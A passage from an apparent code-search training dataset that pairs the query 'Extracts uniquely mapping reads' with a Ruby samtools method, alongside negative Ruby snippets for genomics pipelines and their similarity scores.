"def liftchain(outfile)\n #Future: Add option to recycle old chainfile #\n processes = CONFIG[:processes]\n blat_opts = CONFIG[:blat_opts]\n \n cp CONFIG[:source_fa], \"#{RUNDIR}/source.fa\"\n cp CONFIG[:target_fa], \"#{RUNDIR}/target.fa\"\n\n to_2bit \"#{RUNDIR}/source.fa\"\n to_2bit \"#{RUNDIR}/target.fa\"\n\n to_sizes \"#{RUNDIR}/source.2bit\"\n to_sizes \"#{RUNDIR}/target.2bit\"\n\n # Partition target assembly.\n sh \"faSplit sequence #{RUNDIR}/target.fa #{processes} #{RUNDIR}/chunk_\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n 'faSplit -oneFile size %{this} 5000 %{this}.5k -lift=%{this}.lft &&' \\\n 'mv %{this}.5k.fa %{this}'\n\n # BLAT each chunk of the target assembly to the source assembly.\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"blat -noHead #{blat_opts} #{RUNDIR}/source.fa %{this} %{this}.psl\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"liftUp -type=.psl -pslQ -nohead\" \\\n \" %{this}.psl.lifted %{this}.lft warn %{this}.psl\"\n\n # Derive a chain file each from BLAT's .psl output files.\n parallel Dir[\"#{RUNDIR}/chunk_*.psl.lifted\"],\n 'axtChain -psl -linearGap=medium' \\\n \" %{this} #{RUNDIR}/source.2bit #{RUNDIR}/target.2bit %{this}.chn\"\n\n # Sort the chain files.\n parallel Dir[\"#{RUNDIR}/chunk_*.chn\"],\n 'chainSort %{this} %{this}.sorted'\n\n # Combine sorted chain files into a single sorted chain file.\n sh \"chainMergeSort #{RUNDIR}/*.chn.sorted | chainSplit #{RUNDIR} stdin -lump=1\"\n mv \"#{RUNDIR}/000.chain\", \"#{RUNDIR}/combined.chn.sorted\"\n\n # Derive net file from combined, sorted chain file.\n sh 'chainNet' \\\n \" #{RUNDIR}/combined.chn.sorted #{RUNDIR}/source.sizes #{RUNDIR}/target.sizes\" \\\n \" #{RUNDIR}/combined.chn.sorted.net /dev/null\"\n\n # Subset combined, sorted chain file.\n sh 'netChainSubset' \\\n \" #{RUNDIR}/combined.chn.sorted.net #{RUNDIR}/combined.chn.sorted\" \\\n \" #{RUNDIR}/liftover.chn\"\nend",
"def consolidation\n end",
"def get_all_alignments_as_string\n @alignments.values.compact.collect{ |a| get_alignment_as_string(a) }.insert(0, alignment)\n end",
"def merge_gemfiles(*path, unlock: [])\n gems_remotes = Set.new\n dependencies = Hash.new do |h, k|\n h[k] = Hash.new do |h, k|\n h[k] = Hash.new do |a, b|\n a[b] = Array.new\n end\n end\n end\n path.each do |gemfile|\n bundler_def = Bundler::Dsl.evaluate(gemfile, nil, [])\n gems_remotes |= bundler_def.send(:sources).rubygems_remotes.to_set\n bundler_def.dependencies.each do |d|\n d.groups.each do |group_name|\n if !d.platforms.empty?\n d.platforms.each do |platform_name|\n dependencies[group_name][platform_name][d.name] = d\n end\n else\n dependencies[group_name][''][d.name] = d\n end\n end\n end\n end\n\n contents = []\n gems_remotes.each do |g|\n g = g.to_s\n if g.end_with?('/')\n g = g[0..-2]\n end\n contents << \"source '#{g.to_s}'\"\n end\n dependencies.each do |group_name, by_platform|\n contents << \"group :#{group_name} do\"\n by_platform.each do |platform_name, deps|\n deps = deps.values.sort_by(&:name)\n if !platform_name.empty?\n contents << \" platform :#{platform_name} do\"\n platform_indent = \" \"\n end\n deps.each do |d|\n if d.source\n options = d.source.options.map { |k, v| \"#{k}: \\\"#{v}\\\"\" }\n end\n contents << [\" #{platform_indent}gem \\\"#{d.name}\\\", \\\"#{d.requirement}\\\"\", *options].join(\", \")\n end\n if !platform_name.empty?\n contents << \" end\"\n end\n end\n contents << \"end\"\n end\n contents.join(\"\\n\")\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def compile_files(files)\n files.each do |base_path|\n # We do this second glob in case the path provided in the tayfile\n # references a compiled version\n Dir[@base_dir.join('src', base_path + '*')].each do |path|\n path = Pathname.new(path).relative_path_from(@base_dir.join('src'))\n file_in_path = @base_dir.join('src', path)\n file_out_path = asset_output_filename(@output_dir.join(path), @sprockets.engines.keys)\n\n if @sprockets.extensions.include?(path.extname)\n content = @sprockets[file_in_path].to_s\n else\n content = File.read(file_in_path)\n end\n\n FileUtils.mkdir_p(file_out_path.dirname)\n File.open(file_out_path, 'w') do |f|\n f.write content\n end\n end\n end\n end"
] |
[
"0.627244",
"0.6105935",
"0.60039854",
"0.58686095",
"0.56690675",
"0.5590018",
"0.556866",
"0.55033255",
"0.54632646",
"0.5396619",
"0.53854",
"0.5342837",
"0.5342266",
"0.53063905",
"0.52958137",
"0.5234907",
"0.51962095",
"0.5195997",
"0.5194503",
"0.5163467",
"0.51433927",
"0.5121362",
"0.5097203",
"0.5087505",
"0.5079219",
"0.5043532",
"0.5025654",
"0.49907675",
"0.49867225",
"0.49548012",
"0.4950227",
"0.49411485",
"0.49365535",
"0.48951596",
"0.48735565",
"0.48712978",
"0.48683238",
"0.4866746",
"0.48641786",
"0.48592395",
"0.48277566",
"0.48081517",
"0.47908905",
"0.47616646",
"0.4757657",
"0.47544533",
"0.47324783",
"0.47308615",
"0.47094497",
"0.47036338",
"0.46891367",
"0.4687731",
"0.4677225",
"0.4676578",
"0.46687",
"0.46436527",
"0.4639864",
"0.4639122",
"0.4638224",
"0.46292782",
"0.4604604",
"0.46036103",
"0.46008894",
"0.4590534",
"0.4577429",
"0.45659137",
"0.4561208",
"0.4561208",
"0.45431095",
"0.45375663",
"0.45337754",
"0.4526087",
"0.4525776",
"0.45235586",
"0.45231047",
"0.451901",
"0.45022237",
"0.45019612",
"0.4501929",
"0.44908783",
"0.4481096",
"0.44657993",
"0.44615817",
"0.4452506",
"0.44427848",
"0.44112468",
"0.44089225",
"0.44050822",
"0.43962005",
"0.43938315",
"0.43914685",
"0.43856242",
"0.43839625",
"0.43839625",
"0.43835887",
"0.43822983",
"0.43816715",
"0.43787426",
"0.43732274",
"0.4370796"
] |
0.7179231
|
0
|
Extracts uniquely mapping reads
|
def extract_uni
  # Extract all uniquely mapping reads: write the SAM header first, then
  # append only the alignments whose NH tag reports a single hit (NH:i:1).
  run_cmd(
    "samtools view -H #{@names.get('mapped_merged')} " \
    "> #{@names.get('mapped_uniq')}"
  )
  # The pattern matches NH:i:1 only when followed by a tab or end of line,
  # so multi-mappers such as NH:i:10 or NH:i:12 are not picked up. Header
  # lines from -h carry no NH tag and are dropped by the grep; the header
  # was already written above.
  run_cmd(
    "samtools view -h #{@names.get('mapped_merged')} " \
    "| grep -P 'NH:i:1(\t|$)' " \
    ">> #{@names.get('mapped_uniq')}"
  )
  # Coordinate-sort the filtered alignments and emit BAM.
  run_cmd(
    "samtools sort -o #{@names.get('mapped_uniqsort')} -O bam -T " \
    "tmp.bam #{@names.get('mapped_uniq')}"
  )
end
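
A hedged alternative (editor's sketch, not part of the original method): samtools 1.12 and later can filter on the NH tag directly via `view -d`, which collapses the header copy and the grep pass into a single call. The name keys below are assumed to match those used above; everything else follows the original helper conventions.

def extract_uni_with_tag_filter
  # -d NH:1 keeps only alignments whose NH tag equals 1 (a unique hit);
  # -b emits BAM with its header intact, so no separate -H step is needed.
  # Requires samtools >= 1.12.
  run_cmd(
    "samtools view -b -d NH:1 " \
    "-o #{@names.get('mapped_uniq')} #{@names.get('mapped_merged')}"
  )
  # Coordinate-sort the filtered alignments, as in extract_uni.
  run_cmd(
    "samtools sort -o #{@names.get('mapped_uniqsort')} -O bam -T " \
    "tmp.bam #{@names.get('mapped_uniq')}"
  )
end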
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def hash_selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\t\t\t\t\t\t\t# read id is key and cigar is value\n\t\t\t\t\tselread[saminfo[0]][:seq] = [saminfo[3], saminfo[9]].join(\"\\t\")\t# read id is key and alignment position & read sequence is value\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def output_idmap(refseq_data, up)\n taxid = refseq_data[:taxid]\n gene_label_url = URI.escape(refseq_data[:gene_label])\n up = up.split(\"-\").first if up.index(\"-\") # with \"-\" means isoform's ID. expect to protein's ID\n\n unless $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"]\n $output_ttl.puts triple(\"<http://togogenome.org/gene/#{taxid}:#{gene_label_url}>\", \"rdfs:seeAlso\", \"upid:#{up}\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdf:type\", \"<http://identifiers.org/uniprot>\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"up:#{up}\")\n $output_ttl.puts triple(\"up:#{up}\", \"dct:publisher\", \"<http://identifirs.org/miriam.resource/MIR:00100134>\") # UniProt (www.uniprot.org)\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"tax:#{taxid}\")\n $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"] = true # to prevent duplicate output\n $taxid_list[taxid] = true\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def cache_ids()\n hit_values = File.open(@mzid_file) do |io|\n doc = Nokogiri::XML.parse(io, nil, nil, Nokogiri::XML::ParseOptions::DEFAULT_XML | Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::STRICT)\n doc.remove_namespaces!\n root = doc.root\n \n cache_db_seq_entries(root)\n cache_pep_ev(root)\n \n peptide_lst = root.xpath('//Peptide')\n @pep_h = Hash.new\n @mod_h = Hash.new\n peptide_lst.each do |pnode|\n \n pep_id = pnode['id']\n pep_seq = get_peptide_sequence(pnode)\n mod_line = get_modifications(pnode)\n @pep_h[pep_id] = pep_seq \n @mod_h[pep_id] = mod_line \n end\n \n end\n end",
"def hash_mm_selreads(cigarstring, selread)\n\t\thash = Hash.new {|h,k| h[k] = {} }\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\thash[cigar.read_id] = [cigar.data, cigar.pos].join(\"\\t\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn hash, count.to_i\n\tend",
"def outputs\n id_array = []\n reads.each do |read|\n id = \"s_#{self.lane}_#{read}_#{self.barcode_string}.fastq.gz\"\n id_array << id\n end\n id_array\n end",
"def reverse_get mapping\n (@map.rassoc(mapping) || (raise \"#{mapping} is not a mapping of a registered id\"))[0]\n end",
"def uniqueSequences file\n\n seqIDs = {}\n printSeq = 1\n File.open(file,\"r\") do |f|\n while l = f.gets\n if l[0] == \">\"\n key = l.split(\"\\n\")[0].split(\" \")[0]\n if seqIDs.has_key? key\n printSeq = 0\n else\n seqIDs[\"#{key}\"] = 0\n printSeq = 1\n puts l\n end\n elsif printSeq == 1\n puts l\n end\n end\n end\n\n end",
"def selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\n\t\t\t\t\tselread[saminfo[0]][:bwapos] = saminfo[3]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def read_seq(seq_file)\n seq_objs = Hash.new\n Bio::FlatFile.open(seq_file, \"r\").each_entry do |f|\n seq_objs[f.definition] = f\n end\n return(seq_objs)\nend",
"def duplicate_imports_info\n import_frequency_mapping = {}\n all_imports.uniq.each do |item|\n item_occurrence = all_imports.count(item)\n if item_occurrence > 1\n import_frequency_mapping[item.chomp] = item_occurrence\n end\n end\n import_frequency_mapping\n end",
"def paired_nodes(node)\n to_return_node_ids = Set.new\n log.debug \"Found #{node.short_reads.length} short reads associated with node #{node}\" if log.debug?\n node.short_reads.each do |read|\n pair_read_id = @velvet_sequences.pair_id(read.read_id)\n unless pair_read_id.nil? #i.e. if read is paired\n @read_to_nodes[pair_read_id].each do |node_id|\n to_return_node_ids << node_id\n end\n end\n end\n # Convert node IDs to node objects and return\n return to_return_node_ids.to_a\n end",
"def mapping; end",
"def mapping; end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def loadMap()\n\t\treturn @rankedDB.execute(\"SELECT map FROM ranked WHERE idMap = '#{@idMap}'\").shift.shift\n\tend",
"def generate_identity_map(source_url, source_body)\n mp = []\n source_body.split(\"\\n\").each_with_index do | line, n |\n last_col = line.length\n mp << SourceMap::Mapping.new(source_url, SourceMap::Offset.new(n, 0), SourceMap::Offset.new(n, 0))\n mp << SourceMap::Mapping.new(source_url, SourceMap::Offset.new(n, last_col), SourceMap::Offset.new(n, last_col))\n end\n SourceMap::Map.new(mp)\n end",
"def loci\n CSV.read(@file).map do |row|\n {\n :name => row[@columns[:name]],\n :target => row[@columns[:target]],\n :strand => STRAND_TOKENS[row[@columns[:strand]]],\n :start => row[@columns[:start]].to_i - 1, # This arithmetic gives\n :stop => row[@columns[:stop]].to_i, # inclusive, one-indexed\n # slices\n }\n end\n end",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def compute_index \n self.rewind\n r = %r{\\<scan\\snum\\=\\\"(\\d+)\\\"|\\<spectrum\\sid\\=\\\"(\\d+)\\\"}\n index = {}\n while (!self.eof) \n pos = self.pos\n if (r.match(self.readline)) then \n m = $1 ? $1 : $2\n index[m.to_i] = pos\n end\n end\n index\n end",
"def readIDSFile(filename, char_hash)\n File.open(filename) do |f|\n while (line = f.gets)\n next if line.match(/^;;/) # line commented out?\n a = line.strip.split(\"\\t\")\n char_hash[a[0]] = Hash.new() unless char_hash.has_key? a[0]\n char_hash[a[0]][:ids] = a[2].to_u\n end\n end\nend",
"def construct_id_map_for_composite(records)\n id_to_record_map = {}\n ids = []\n records.each do |record|\n primary_key ||= record.class.primary_key\n ids << record.id\n mapped_records = (id_to_record_map[record.id.to_s] ||= [])\n mapped_records << record\n end\n ids.uniq!\n return id_to_record_map, ids\n end",
"def km_get_reacid(data)\n return data.map{|d| d.scan(/(?<r>R\\d{5})/)}.flatten.sort\nend",
"def extract_ids\n # no-op\n end",
"def raw_userids\n users = {}\n cmd = \"find /data/log/ctr -name 'ctr*.gz' -mtime -2 | xargs zcat\" \n IO.popen(cmd) do |io|\n while line = io.gets\n r = get_uid(line)\n #users[r[0]] = true # from cookie\n users[r[1]] = true # from sifi param\n end \n end\n users\nend",
"def before_mapping_hash(gid_array)\n @log.info \"BEFORE_MAPPING_HASH\"\n ##TODO test test test\n\n hash = Hash.new\n gid_array.each { |gid| hash[gid] = @redis_connector.real_partition_of_node(gid).to_i }\n hash\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} 